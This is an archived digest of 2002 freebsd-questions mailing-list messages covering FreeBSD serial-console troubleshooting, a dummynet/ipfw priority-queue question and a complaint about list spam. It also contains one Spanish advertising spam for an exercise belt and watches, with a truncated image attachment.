From owner-freebsd-questions Sun Jun 23 0:18:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 8244B37B405 for ; Sun, 23 Jun 2002 00:18:10 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 00:18:09 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: "Corey Snow" Date: Sun, 23 Jun 2002 00:18:09 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Serial console does not work at >9600 bps, other issues Reply-To: pjklist@ekahuna.com Cc: Questions@FreeBSD.ORG, djf2 , Aaron Burke In-reply-to: <3D0F3858.24497.18675BCE@localhost> References: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623071809831.AAA714@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 18 Jun 2002, at 13:40, Corey Snow boldly uttered: > On 17 Jun 2002, at 20:35, djf2 wrote: > > > On Mon, 17 Jun 2002, Philip J. Koenig wrote: > > > > > I see another factor, looking through the handbook - if you're trying > > > to get a login prompt, you have to tell the getty on that port what > > > speed you want, ie in the /etc/ttys file. Did you do that? (Handbook > > > section 15.6.4.4) > > > > > > > > > Phil > > > > > > > Yup. I can access the console just fine at 9600 baud. I'm just > > trying to increase that speed. The documentation makes it seem like its > > possible, but I have yet to get the serial port to use any other speed. > > > > I've been having the same problem. I tried everything I could think > of. The only other thing I can think of to try is to use a different > terminal program. However, since I can use ssh to get into the box, I > don't worry too much about a 9600 baud serial console. It's > irritating, but not hugely so. > > I suppose it could also be related to the ancient motherboard my > headless box runs on. It's an old 486 DX2/66 and may not do well at > higher COM port speeds. I finally got the serial console working on the 2 boxes that had been laughing at me. This is why it made me crazy: #1: The Intel L440GX+ SMP board has its COM1 and COM2 connectors REVERSED. For some incredibly dumb reason, COM1 comes out of the right-hand connector, and COM2 out of the left-hand connector. #2: The /boot.config option "-D" DOES NOT WORK. I had been using this instead of "-h" in the hopes that if the only active console was not working, I could use the other one. Well I have discovered on 2 different boxes that all I get if I set this option is a single "\" character at the beginning of the boot process, then nothing until the getty runs and gives a login prompt. "-h" works fine to toggle the serial console on from the default vga console. FWIW, the "-P" option also works fine, determining which console to make active depending on whether a keyboard is installed at boot time. #3: As Corey Snow observed, despite going through all the recommended steps, the serial console refuses to budge from 9600 bps. I only tried making a modest change to 19200, which resulted in nothing but garbage during the boot sequence, until the getty launched with the login prompt, which appeared to run fine at 19200. Going back to 9600 on my terminal gave me normal output. I used as my latest reference for configuring the serial console one of the excellent (although temporarily not being updated) documents from www.mostgraveconcern.com/freebsd. I have found those 'cheatsheets' to be invaluable on many occasions. Clearly the prescribed procedure must have worked at one time, because those documents are based on his personal experience. I suspect sometime during the 4.x release cycle, the code got broken. The only issue I take with the abovementioned document on the serial console is his un-notated usage of "disklabel -B wd0" which is A) older syntax for ATA disks and B) not recommended according to disklabel docs unless you have a "dangerously dedicated" disk. In my case I specified my FreeBSD slice, rather than the whole disk. (I usually install a small MSDOS slice as the first partition.) Hope it helps, and always interested in other datapoints. Phil -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 0:25:25 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp2.mbox.com.au (203-134-146-019.cust.pth.iprimus.net.au [203.134.146.19]) by hub.freebsd.org (Postfix) with ESMTP id BD11937B401 for ; Sun, 23 Jun 2002 00:25:19 -0700 (PDT) Received: from nms2.mbox.com.au (webmail.mbox.com.au [192.168.20.4]) by smtp2.mbox.com.au (Sun Internet Mail Server sims.4.0.2000.05.17.04.13.p6) with ESMTP id <0GY5006A9DONFF@smtp2.mbox.com.au> for freebsd-questions@FreeBSD.ORG; Sun, 23 Jun 2002 15:19:35 +0800 (WST) Received: from mbox.com.au ([127.0.0.1]) by nms2.mbox.com.au (Netscape Messaging Server 4.15) with ESMTP id GY5DS002.L2Q for ; Sun, 23 Jun 2002 15:21:36 +0800 Date: Sun, 23 Jun 2002 17:21:36 +1000 From: BSD Freak Subject: Dummynet priority rule doesn't work To: FreeBSD Questions Message-id: <1770ff8176cf3c.176cf3c1770ff8@mbox.com.au> MIME-version: 1.0 X-Mailer: Netscape Webmail Content-type: text/plain; charset=us-ascii Content-language: en Content-disposition: inline Content-transfer-encoding: 7BIT X-Accept-Language: en Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all, I'm relatively inexperienced when it comes to dummynet but I have read the man page and lots more about it. Basically the situation is this: We have a FreeBSD 4.5R router (with dummynet compiled in the kernel) running a 64Kbps ISDN line to another site. The line is usually saturated making access very slow and unreliable for some hosts on the network. We have one host (192.168.0.50) on the network that is particularly important and which requires priority access. So I added the following rules, but this does not seem to help: ipfw pipe 1 config bw 64Kbit/s ipfw queue 1 config pipe 1 weight 90 ipfw queue 2 config pipe 1 weight 1 ipfw add 400 queue 1 tcp from 192.168.0.50 to any ipfw add 500 queue 2 ip from any to any What am I doing wrong? Any help would be greatly appreciated.... --------------------------------------------------------------------- NEW to mBox, receive faxes to any email address! Find out more http://www.mbox.com.au/fax To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 0:42:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 2D1A637B403 for ; Sun, 23 Jun 2002 00:42:24 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 00:42:18 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 00:42:18 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com Cc: Ruben de Groot In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623074218749.AAA684@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Fri, 21 Jun 2002 15:50:55 +0200 > From: Ruben de Groot > > On Fri, Jun 21, 2002 at 09:12:25AM -0400, Stephen Hovey typed: > > > > > > > > The spam on this list is pretty phenomenal. Was it always this > > > > bad? > > > > > > > > > I don't think so. Then again, spam has gotten a lot worse everywhere > > > over the last year or so. > > > > > > Then again, if questions@freebsd.org was like 95% of the email lists > > > out there and didn't allow anyone in the whole wide world to post > > > without being a listmember, I *guarantee* it would not be as bad as > > > it is now. > > > > > > > I think this was talked about in the past and the reasoning had something > > to do with a problem of legit users not gettin it on their from addresses > > in that arrangement (in other words signing up one way, but emailing from > > another)... Personally, I think if you cant figure out that piece, you > > should be a windows user.. > > > > From /etc/motd (what every newbee will read after the first successfull > installation): > > If you still have a question or problem, please take the output of > `uname -a', along with any relevant error messages, and email it > as a question to the questions@FreeBSD.org mailing list. > > I consider this an excellent service provided by FreeBSD. It may be an "excellent service" to some minority of FreeBSD users, but we all thought having open SMTP relays was an "excellent service" too, back in the innocent years before the explosion of spam. Already at least one new user that I saw gave up after one day of being on this list because of all the junk on it, and I also know that some users in certain parts of the world consider it to be a major problem to receive large parcels of junk - in many cases this costs them real money due to usage costs. I am on at least 8 other mailing lists that allow user posting and FreeBSD-Questions is the ONLY one that I see this problem on! (including the other FreeBSD lists I subscribe to) Either there should be some virus-scanning mechanism deployed (something several of the lists I'm on do), something should be done about moderation (ie assign several people the ability to temporarily block traffic from certain senders) or the idea of allowing posting from anywhere should be reconsidered. Phil -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 0:46: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from thor.sonimag.net (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by hub.freebsd.org (Postfix) with ESMTP id 8AC9737B400; Sun, 23 Jun 2002 00:41:30 -0700 (PDT) Received: from thor.sonimag.net (localhost [127.0.0.1]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5N1Iuj28785; Sun, 23 Jun 2002 03:19:00 +0200 Received: from llca114.servidoresdns.net (llca114.servidoresdns.net [217.76.128.82]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5JJ4Os01668 for ; Wed, 19 Jun 2002 21:04:24 +0200 Received: from jose (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by llca114.servidoresdns.net (8.11.0/8.10.2) with SMTP id g5JJ4kD11413 for ; Wed, 19 Jun 2002 21:04:47 +0200 Message-ID: <002601c217c3$ca7fa620$0100c0a8@jose> From: "Hispanet Technology" To: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0022_01C217D4.8D47E540" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Subject: [Publicidad] ABGYMNIC + RELOJES GENEVA X-BeenThere: publicidad@sonimag.net X-Mailman-Version: 2.0.10 List-Help: List-Post: List-Subscribe: , List-Id: Lista de Publicidad List-Unsubscribe: , List-Archive: Date: Wed, 19 Jun 2002 21:01:58 +0200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0023_01C217D4.8D47E540" ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable WWW.OBJETS.NET KIT SPORT 2002 ABGYMNIC 2002 GIMNASIA PASIVA, 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE ABDOMINALES -CENTRAL CON 6 PROGRAMAS=20 -CONTROL DE INTENSIDAD - 2 CINTURONES, UNO PARA PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS - 2 PILAS (1 DE REPUESTO) - MANUAL DE INSTRUCCIONES EN CASTELLANO - 1 A=D1O DE GARANTIA + PAREJA DE RELOJES GENEVA CON CHAPADO EN ORO, EN ESTUCHE DE LUJO PVP: 42 ? IVA INCLUIDO PORTES POR Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL PRECIO IMPORTANTE:=20 NO ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A BAJO COSTE) SOLAMENTE OBJETS.NET (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL PEDIDOS: MANDAR E-MAIL O FAX CON LOS SIGUIENTES DATOS: -NOMBRE O RAZON SOCIAL -CIF/NIF -TELEFONO DE CONTACTO -DIRECCION Y CODIGO POSTAL TLF: 902 30 12 30 FAX: 954 27 92 02 E-MAIL: pedidos@objets.net VENTA CONTRAREEMBOLSO A TODA ESPA=D1A (SI NO QUEDA SATISFECHO, LE DEVOLVEMOS SU DINERO) Oferta valida salvo error tipogr=E1fico o fin de existencias. Si ha recibido este mensaje por error o desea que le borremos de nuestra base de datos, puede darse de baja reenviando este mensaje poniendo en = el asunto REMOVE. Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n sobre = correo electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 Bajo el = decreto S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las normativas internacionales sobre SPAM, este E-mail no podr=E1 ser considerado SPAM mientras incluya una forma de ser removido.=20 ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
WWW.OBJETS.NET=
KIT=20 SPORT 2002
 
3D"ABGYMNIC
ABGYMNIC=20 2002
GIMNASIA PASIVA,=20 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE = ABDOMINALES
 
-CENTRAL CON 6 PROGRAMAS =
-CONTROL DE=20 INTENSIDAD
- 2 CINTURONES, = UNO PARA=20 PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS
- 2 PILAS (1 DE=20 REPUESTO)
- MANUAL DE = INSTRUCCIONES EN=20 CASTELLANO
-=20 1 A=D1O DE = GARANTIA
+
3D""
 
PAREJA DE = RELOJES GENEVA CON=20 CHAPADO EN ORO, EN ESTUCHE DE LUJO
PVP: 42 =80 IVA=20 INCLUIDO
PORTES = POR =20 Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL=20 PRECIO
 
IMPORTANTE:
NO=20 ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A = BAJO=20 COSTE)
SOLAMENTE OBJETS.NET=20 (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL
 
PEDIDOS:
MANDAR E-MAIL O = FAX CON LOS=20 SIGUIENTES DATOS:
-NOMBRE O RAZON=20 SOCIAL
-CIF/NIF
-TELEFONO DE=20 CONTACTO
-DIRECCION Y = CODIGO=20 POSTAL
 
TLF: 902 30 12=20 30
FAX: 954 27 92=20 02
 

VENTA = CONTRAREEMBOLSO A TODA=20 ESPA=D1A

(SI NO QUEDA SATISFECHO, = LE=20 DEVOLVEMOS SU DINERO)

Oferta valida salvo error tipogr=E1fico o fin de = existencias.

Si ha recibido este mensaje por error o desea que le borremos de=20 nuestra
base de datos, puede darse de baja reenviando este mensaje = poniendo=20 en el asunto REMOVE.

Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n = sobre=20 correo
electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 = Bajo el=20 decreto
S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las = normativas
internacionales sobre SPAM, este E-mail no podr=E1 ser = considerado=20 SPAM
mientras incluya una forma de ser removido.
=

------=_NextPart_001_0023_01C217D4.8D47E540-- ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="abgymnic1.jpg" Content-Transfer-Encoding: base64 Content-ID: <001e01c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEAlgCWAAD/7RJCUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAlgAAAAEA AgCWAAAAAQACOEJJTQQNAAAAAAAEAAAAeDhCSU0D8wAAAAAACAAAAAAAAAAAOEJJTQQKAAAAAAAB AAA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9m ZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4 AAAAAABwAAD/////////////////////////////A+gAAAAA//////////////////////////// /wPoAAAAAP////////////////////////////8D6AAAAAD///////////////////////////// A+gAADhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBBQAAAAAAAQAAAABOEJJTQQMAAAA ABCxAAAAAQAAAHAAAABLAAABUAAAYnAAABCVABgAAf/Y/+AAEEpGSUYAAQIBAEgASAAA/+4ADkFk b2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwMDAwRDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwM DBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgASwBwAwEiAAIRAQMRAf/dAAQAB//E AT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAAAQACAwQFBgcI CQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMH JZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaG lqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEU obFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSF tJXE1OT0pbXF1eX1VmZ2hpamtsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A5DFbbmZ7aXXO Y2x7nWWSTsraHXX2xP8Ag6WPWtXjY9wordWxtd1jKnVgH1axaw312fbd3q25NNXpXZDXt9H9PXX6 X+DqodIx7H1XbQWjLc3EF0aMZIys1/8AYqro9T/gf+MW3g5dt2W3qzA9ldGHldQx6XAEVk7+n4LW urbXvss/VX/vqxhgOHWiZcRo6+mPp/wf1iycje50pwWdOyXbWFtYvcNMd1xFsn/B7P5uu7/gLLmX f4P+cWl0z6tHJxa8vLuZh03/AMw0hz7XAyWuLLLaGV7mt9TZvfb6P6bZXWrONjPeeldOrkitrX3V lhaytzmuvdmXZD2ta63H9f8Amv0tf6v/AMN6C1a6uqFtN19uOcvHZtZZuLmyWMotdtsDP6Qymr1q basmvenjlhelnT9K6vi/q+r5f/R2PLzJjQJjG/6sOKq/75yG/VMV5+Rj5N3p0UMYRc2t+51lhc77 MK3Wem62uiuy6z0Lr/8ABV/zln6OF/1e6fRS223MIG5zLGtr3HexrH3iv9O39HjbnetZ/wCZ+leb 0vMNlpy8qp2O6ptTKGW6CLG5Flz3PYP01n6Vjbq2/oPXVjBwcl0e/Hdb6VlWS8WbaxVcX+pVit2H 0W7PQpqr/m/Sos/06I5eI1MTVnc8Pp/R/SWjmboDJG6GkYR+b9L9BwL+h+g+zGe+curdvaK3emHB 7K20mz1PU9Zzbat+z+Yttrxv+EU6ehMubZZWXQxza2sc0BznPdtpc33u9jq25D7fp+l6Vf6X9Mui p/Q47C6zFLMX1vRLby1oDHNv92+n1GXXXtqdXvZ6mVkf4NlKRttY52P6mI/c41Y59YD0afTayzZb Z6bcjHrc31K7v1b9bv8AZ61SQw4xvEnTvWsOLiv+/wCj+4uOeZ+Wt+w/S/71y/8Am651f2THtis2 lzrgz3ua1rf5lu8fSusZXXvt9P0fUtesjKr6bUA3Ezbsq/dB26UgD6TvWIZ6u7/Beh+j/wAJ6n+k 6DN687F6q6yp1FlAobUaGWGGv3vv3Mtg1vcxtv2d21llD6/8Iuf6lkYORlVPxMavChm21lJBrMH2 WBjGVtqs2+yzb/Ofo1HlxCMCYxA16n1f3o/3l+PLknOPuE6RAjQjwj+pL+7/AFXU6NiW5GJaThX5 Ze8NZbXY1pYGj9I2tltte5znPZ+k9OzYtI4zxY4noJ9IwYfdsLQRbo6719rfoM97v9Fd/wAHszun XdHrwa2ZGdmU3Q5z6qC8Vtc4u+htqd7nMZTv/Se//SKXUM3p5xnDBzs2257tpruss2+kR+lDpYxl m53t2rFyDNPNKIExEy4b4eZjCvl4uOGbHD/Eb4qmx1I14mMfV6SzHfYCyu37Q2w7vc3f6Nb7PobH s/4z/hVyz7LhY2Humedx+Hirt2Tfa0NtufY1pLgHvc4BzvpuaHH6T/zlnWEeoNRyO6uYMRxxIkbk TZN5JD6e9PLKLHl2f//Q5rLGLgOdhuquLC0Oextz2sdva0ndWHbXfuP3NQG5WEW7RjW7W8N9eyB/ VaHbVPNtsz2Y2VHvNQrs7g2UgU2u/t+27/rizgYn7k2MbGpN9dW1LmZCWkMXCdv1OD/1W6D39P8A Sa92G54IkB1ryPx3KLT014H+TwJ4mxyhW+1+O5jSHVtZqO4EzuU+nlpcca4gNcJY8+I9yaRQJ108 TsyRzyMoisY4h/mMHzf+FswOmSG/YG69y8q5R03p9wk4VbWjUk66Qj4jei5LYeY2mHbSAQf3vct3 F6f0+vHtOPcXVsax1b3ub7rHHbt9vt2/+e1BPLWwIPi3cNk3L2pRP7uLD/d/RxvG5B6fj5BqPT6j EbXTGn+arlOL0uwADDqBdrG2f4Lbz/q9V1MVZzsgVY7WBt20NJDzq4Ut3e5u5Apw+n4x9Oh77LR9 L1AA46/mNb+akcsTEVfF13RD3RklftnHfp/V4f8AF9MGvT0zpznQ7HrYACRDATp4BVLLMKvOuxqK MeKQJfdtr3OloexntLfZv/6D1vOvbh+q/LZ6DccOFjyZ0bwxo/lO/wDBFx+DlkZNt1rntdkBxfta x8lzvUc1zbvbt3JYjKXEe23n/grOb5mWPgjAxBlqax4/l/xHdZZWGgvrw2t/OIe1xaIPv2sb726f mJ/UYIPp4YB5O8aaOf7vZ/I/N/PQWdSA2kXW6EO+hSIcA3y/eakOogbpvv1bs0NY0A9u7/Oen1k7 D7T/AN6w/es37w/xMf8A3qb1q9WxhgiJJnb7hPtc1jt38v2qhf1N1V5Y2jHeAQN7RLT39phqLkdS L63MrtsDXDa9r3MLdv7nsa3csi4jdyJkaSnwgd5fYsyc3nA0nX+DD/vX/9Hkenvxxj5FVzjW9+x1 D+WhzdzX7/67HfTQrMO/ffuAPoNbbYWEObte5tbHbmn956WPRfbVbaxjn10BptLQTsDiWsc6Posc 5qGLHNB2OLQ8EOjggn6J/eQrUkFdegB6L4rKn27bXOY06Etj/vy1ehnMw8xxrx3ZdDZaT6ZsYRHb 2WMWPX6Xqs9Xd6Uj1Nkbts+709356PldSy8iyfUdTU2BTj1Oc2utg+jXUwH/AKf+E/nETASB4joe n7VRySgYmIHFE3xHt+7wvUMrwcmw2XdNLHkySaXNP37UXPON9jFNdLqqgxwfAMyRyNwXHfb86sEj KvAGpi1//klvs6d9c66Bkty3ekSGh32rdq4b2t2v3fmqMcoJH0ynpWlcbYHxGcRrjhZB1Evbv/mz b+Bm44xvRNrXN0ntrH7pRtuI22h9Mvc8SW7tBtI3cfmf1li5eV9bMGttuVlPFbnbAd9b/dBdG3bu /Mcg0/WfqlLw60VZI0G19bGu/s20Nrc13+emT5MAn1yEj0lDh/7r/uGSHxKRAvGKHWE+I/ZKEf8A psfrNk1HOtw6bLLgx+6+ywiPVMufVU1v+Dqc/wCm7/CK30wMbh12BlDiadzprxXu03vndb+l9fb+ b/hv5n9IsDJey3LvsrnY+x7m7vpbXEuG7+Utn6s5GXmdXwOnZGVf9jdNfpNsc0NY1r7mMYR9BvqM apoR4YiPb82pOZnMyPU6f3XRt6izGvex1Nbns2lm3Hxth05d7Nn/AGyxQd1is2CxtZEMI2iqho3e 3Xaxmz0/Z+5vW5mdC6Y51trm3ZHpAsr33WPc4MG9w3bvoN/SLHb0x9tNdteBQwWNDm+pfa50HX3M rdtamDNA3voeG/Ftx5adRNfMBKhqaPkjd1psS2twe3VjizHgO2+n72/Z/wBIzX6H/XP5xZWR1bPN b6S6v07gQ8CmsGDodj9m9n0vzVsUY2Jj2bOrYLGVOOmTW601tn2gW7bfY3/hUvrb0bp2Bg42RhVN b61231mve9rmbHP9u+y1n0vduYnggiwwZoGHpIIPiH//0qH+L1pdk9TH/dVoB7SXubqsf6wOxXZu /HYKyRtuY0AAWNO17trf31qfVux3SbH32GLMxprbT39Nrt7d/wC7Zf8A4H/wT+cWB1EMOdc6t26t 7y9jiIJDve3c3813u+gmUeO/Bk2x11tDVVZdYGVML7HaNYNST5IY11GvcFFre+qxtlZLXMIc0jkE Hc1w/lNcr12JjZZ+0MuZh2Wy99NrXCmSfe6jIrFvpM3f4HIYz0/zLdilGvXVjN70a8BdOXEzPHde ofVylvUfqxhPLne5u23aG/Sq/VnDfsLtn6Jj/S/fXnp6Vk6bLMW0f8Hk0n8H2VuR6a+t4zBXjvtq ZJO2m9obJ/O/RXbVLiMoGzE14Bhy1ICpxB8+j0P+MIPqd0+l9j7C5r3S+JDahXTTG0N/fsXHPH5V o3Y3V8pzXZLza5g2tN97CQDqWt9W5Sr6bVQH3Zj2Wmphsbj0vDwduv61kV/o66/zfSpfZff/AMD/ ADqZkJMjIjhH9b0r8ekQL45f1fU5AAk+a2Pqtr9YcKIEvf8AAforVkN4E/Nav1Y2ft/C9QkV737i NCB6Vuo/lKI7GuzLAXIA930zAOHhY327Je1ggt32kNDRJ3D+Vbbs+j9P8xZPT2Y12Xbbhk2YDnuF Ljy1pM7XfubP8Hu/wayuqOyL78XJ6g17enF0kDhj3j9K7v8ASft9R/8Ao1S/aIw+pPuwnl9LztuA G1lg/ks/e/l/vqIYePlxRiDtV8Xq/Sb/AL8sfMz4rPFYJqoxjfpr+69FnModZaG/zIBbr3EQ5c11 fHuxPqzjYlzpNWYHtaddgurvc2r/AKG7/jFuMsOTY5lbgaq/513Mn/RM/wDRizPrJNnRHXEc51TQ fJtWRP8A1SjwcQkI/WX7GfnxA4OLcxqMD3MpR4v+g//TxeputbiVNaNheD7iRvNZa1rtn7rXu+l+ /wD9vLEc22ILS4N48h/W/cWt1aPteHG2fs1U7uY937/s/qbP/IKsz+dH0tvef++f4REUulu0Ya0+ 4OHh/q4K/jZ1dYDYMAQZAM/5rlAT6ft27vzt0el/a9T9H/22oM267fS412Tt/s+omz4a9S7F7nF+ r3SfZ8c2+owNgumI8f5JC1q3+zbXWx0dobKyWbYHE6fRmFZbG5s+pH8iZ57Qo5jHpxEhnxSzi/bj Enrt/wB86DGOdZLq9jgOPaFQ69vrrYwkfpz2n6NcOj93+cc1adMbWz6/H+E4/sws76zfzeHMTNnx /M+jH5iMY8uNYyJl0B/9FRllzRB44iMf0iP/AEZwgOVo/V4tHWsMuIDfUMk6DVljVn6aqVffj58f NPOxa8L441vYfQr76bqhjOeHtgNFTXD+9V+n/VvAbd62XkVwN2yj1GQ0kHY6xwd7tjvdsauQb9D/ AAf8E47fzKi5cQETwSMo/YLb/NynKuOIgfD1Sr/Ber6HFOF6drmNdt7uA5+J+kqfXzT/AM2g0WMN h6iHbA4F2307x6mwfmfylgv7/wA381Vsjdrs/szKUBH3JESuXUUjmpZDy8RKAjC41K7/AEfS/wD/ 2QA4QklNBAYAAAAAAAcAAAABAAEBAP/iDFhJQ0NfUFJPRklMRQABAQAADEhMaW5vAhAAAG1udHJS R0IgWFlaIAfOAAIACQAGADEAAGFjc3BNU0ZUAAAAAElFQyBzUkdCAAAAAAAAAAAAAAAAAAD21gAB AAAAANMtSFAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EWNwcnQAAAFQAAAAM2Rlc2MAAAGEAAAAbHd0cHQAAAHwAAAAFGJrcHQAAAIEAAAAFHJYWVoAAAIY AAAAFGdYWVoAAAIsAAAAFGJYWVoAAAJAAAAAFGRtbmQAAAJUAAAAcGRtZGQAAALEAAAAiHZ1ZWQA AANMAAAAhnZpZXcAAAPUAAAAJGx1bWkAAAP4AAAAFG1lYXMAAAQMAAAAJHRlY2gAAAQwAAAADHJU UkMAAAQ8AAAIDGdUUkMAAAQ8AAAIDGJUUkMAAAQ8AAAIDHRleHQAAAAAQ29weXJpZ2h0IChjKSAx OTk4IEhld2xldHQtUGFja2FyZCBDb21wYW55AABkZXNjAAAAAAAAABJzUkdCIElFQzYxOTY2LTIu MQAAAAAAAAAAAAAAEnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAA81EAAQAAAAEWzFhZWiAAAAAAAAAAAAAA AAAAAAAAWFlaIAAAAAAAAG+iAAA49QAAA5BYWVogAAAAAAAAYpkAALeFAAAY2lhZWiAAAAAAAAAk oAAAD4QAALbPZGVzYwAAAAAAAAAWSUVDIGh0dHA6Ly93d3cuaWVjLmNoAAAAAAAAAAAAAAAWSUVD IGh0dHA6Ly93d3cuaWVjLmNoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAGRlc2MAAAAAAAAALklFQyA2MTk2Ni0yLjEgRGVmYXVsdCBSR0IgY29sb3VyIHNwYWNl IC0gc1JHQgAAAAAAAAAAAAAALklFQyA2MTk2Ni0yLjEgRGVmYXVsdCBSR0IgY29sb3VyIHNwYWNl IC0gc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAABkZXNjAAAAAAAAACxSZWZlcmVuY2UgVmlld2lu ZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAsUmVmZXJlbmNlIFZpZXdpbmcg Q29uZGl0aW9uIGluIElFQzYxOTY2LTIuMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdmlldwAA 